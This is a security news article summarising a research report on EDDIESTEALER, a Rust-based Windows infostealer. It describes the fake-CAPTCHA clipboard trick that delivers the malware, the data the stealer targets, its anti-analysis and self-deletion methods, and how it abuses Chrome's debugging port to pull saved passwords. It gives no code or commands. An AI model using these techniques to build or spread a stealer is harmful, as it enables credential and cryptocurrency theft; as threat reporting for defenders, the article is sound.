In a revealing report from Elastic Security Labs, a new Rust-based malware dubbed EDDIESTEALER has emerged as a stealthy threat to Windows systems, employing deceptive fake CAPTCHA pages to deliver a powerful infostealer targeting crypto wallets, browser data, credentials, and messaging apps.
EDDIESTEALER is a Rust-based commodity infostealer capable of:
- Harvesting credentials from browsers and password managers
- Targeting crypto wallets like Electrum, Exodus, and Guarda
- Stealing data from FTP clients and messaging apps like Telegram
- Leveraging Chrome DevTools Protocol to extract saved passwords
- Sending encrypted data via multiple task-specific POST requests to a C2 server
What makes EDDIESTEALER distinct is its use of Rust, which offers “enhanced stealth, stability, and resilience against traditional analysis workflows,” Elastic notes.
EDDIESTEALER’s infection chain is as clever as it is effective:
- Users are shown a fake reCAPTCHA interface embedded in a compromised site.
- A JavaScript trick copies a malicious PowerShell command to the user’s clipboard.
- Victims are instructed to run it using Windows + R, unknowingly downloading and executing the malware.
“This command silently downloads a second-stage payload… and executes gverify.js using cscript in a hidden window,” the report explains.
EDDIESTEALER exhibits a range of advanced techniques:
- Encrypted strings using XOR and custom key derivation routines
- API obfuscation via custom WinAPI resolution
- Anti-analysis through memory checks and mutex creation
- Self-deletion using NTFS Alternate Data Streams renaming, inspired by LATRODECTUS
“EDDIESTEALER performs a quick check… If the check fails, it deletes itself from disk,” Elastic reports, detailing its rudimentary sandbox detection.
Additionally, its C2 traffic is highly structured. It uses Base64 and AES-CBC encryption to transmit configuration data and exfiltrated content.
EDDIESTEALER is configured via C2 to exfiltrate a range of sensitive data:
- Crypto Wallets: Exodus, Electrum, DashCore, Daedalus
- Browsers: Chrome, Edge, Firefox, Brave
- Password Managers: Bitwarden, 1Password, KeePass
- FTP Clients: FileZilla, Auto FTP Manager, FTPGetter
- Messaging Apps: Telegram
“The decrypted configuration for this sample contains the following in JSON format: session ID, task list, and AES key,” Elastic explains.
Analyzing EDDIESTEALER is no easy feat. Rust’s memory safety and type system make static analysis more complex.
“A seemingly simple infostealer written in Rust often requires more dedicated analysis efforts compared to its C/C++ counterpart,” Elastic points out.
The researchers utilized tools like rustbinsign, Binary Ninja UIDF, and Unicorn Engine to decrypt strings, reconstruct logic, and interpret memory-safe constructs.
EDDIESTEALER doesn’t stop at local files. It also:
- Launches Chrome with –remote-debugging-port
- Uses WebSockets to open chrome://password-manager/passwords
- Scans Chrome process memory to extract credentials
“This behavior is exploited… where it scans the Chrome process memory to extract plaintext credentials after they have been loaded by the browser,” Elastic reveals.
Elastic observed multiple variants of EDDIESTEALER, each more evasive:
- Newer versions collect GPU info, CPU details, running processes
- Shift from dynamic AES key delivery to hardcoded encryption
- Preemptive profiling of the host to evade sandboxes
This points to an active and evolving malware campaign with a professional development pipeline.
EDDIESTEALER underscores how modern malware developers leverage Rust, legitimate UX patterns (like CAPTCHAs), and DevTools abuse to remain stealthy and effective.
“We have identified 15 additional samples of EDDIESTEALER through code and infrastructure similarities,” the researchers conclude.
As malware tooling continues to evolve with modern languages and anti-analysis techniques, defenders must also adapt their detection and reverse-engineering strategies accordingly.
